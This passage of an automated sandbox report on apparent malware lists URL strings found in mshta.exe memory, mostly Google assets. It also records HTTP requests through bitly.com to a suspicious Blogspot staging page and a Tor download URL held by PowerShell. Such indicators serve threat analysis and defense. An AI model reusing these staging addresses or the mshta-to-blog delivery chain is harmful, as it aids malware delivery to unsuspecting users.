Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/Q
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/T
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/_
Source: mshta.exe, 00000006.00000003.308405199.000000000A307000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.383836757.000000000A359000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.578271881.00000215A61D4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574898077.000001BEEADD5000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574669263.000001BEEAD9D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js(-
Source: mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js)
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js/105
Source: mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js0
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js0I
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js6.html%220
Source: mshta.exe, 0000001B.00000002.575444266.00000215A6101000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574669263.000001BEEAD9D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsC:
Source: mshta.exe, 00000006.00000003.385635808.0000000008DE8000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsH
Source: mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsJ
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsOxL
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsW
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsXxC
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsY
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsal
Source: mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsd
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsh
Source: mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jshC:
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jslC
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsme
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jss
Source: mshta.exe, 00000006.00000003.308405199.000000000A307000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsy
Source: mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/d
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.302524114.000000000AECF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.509428117.00000290ACEB0000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342424142.00000215A3D5D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623318608.00000215A961D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.610943907.0000021CF709E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.603530510.000002632F78C000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/debug/bootstrap
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=I
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.508915853.00000290ACEA4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623774532.00000215A9630000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.611323533.0000021CF70B0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=https://www.googletagmanager.com/gtag/js?id=
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/h
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/m
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audiences2
Source: mshta.exe, 0000000D.00000003.508915853.00000290ACEA4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623774532.00000215A9630000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audienceshttps://stats.g.doubleclick.net/j/collecthttps://www.google.com
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/finance?tab=je..
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jh
Source: mshta.exe, 00000006.00000003.315362219.0000000006715000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jh4T
Source: mshta.exe, 0000001D.00000002.574898077.000001BEEADD5000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jhhe
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jhw6D
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/save
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/saveL
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/shopping?hl=en-GB&source=og&tab=jf
Source: mshta.exe, 00000006.00000003.315362219.0000000006715000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/shopping?hl=en-GB&source=og&tab=jfD
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/webhp?tab=jw
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/webhp?tab=jw00
Source: mshta.exe, 00000006.00000003.282482509.000000000EAE1000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462084143.00000290ABE3A000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.575444266.00000215A6101000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/)
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/4
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/ads/ga-audiences
Source: mshta.exe, 00000006.00000003.300811461.000000000AE98000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/ads/ga-audienceshttps://www.google.%/ads/ga-audiences
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chp
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389513364.000001BEEAD69000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css$
Source: mshta.exe, 0000001D.00000002.558814631.000001BEE8A42000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css(
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css-
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css7
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css:
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssQQC:
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssa
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssh
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssily=Open
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssm/p/ghostbackup15.html%22=)
Source: mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/e
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/h4
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/o?
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/travel/?dest_src=al
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: mshta.exe, 00000006.00000003.332704739.000000000DFD9000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.612130608.000001BEED439000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svgR
Source: mshta.exe, 00000006.00000002.431162379.000000000A337000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svgy
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svgapply(d
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svgsh(c.c
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg&(c=
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg8/
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg;b.pW
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgL
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgPV
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgedP
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgmb(
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svguc
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000006.00000003.309050554.000000000E037000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.pngPV
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462084143.00000290ABE3A000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=q_dnp
Source: mshta.exe, 00000006.00000003.396240494.00000000068E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.wtXa61WU3WQ.L.X.O/m=qawd
Source: mshta.exe, 00000006.00000003.395681837.000000000C3B0000.00000004.00000040.sdmp, mshta.exe, 0000001B.00000002.605755811.00000215A8DD0000.00000004.00000040.sdmp, mshta.exe, 00000021.00000002.618824886.0000021CF72F0000.00000004.00000040.sdmp String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Source: powershell.exe, 00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/?g
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/?gl=GB&tab=j1
Source: unknown DNS traffic detected: queries for: bitly.com
Source: global traffic HTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitly.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: johonathahogyaabagebarhomeintum.blogspot.com
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: johonathahogyaabagebarhomeintum.blogspot.comConnection: Keep-Alive
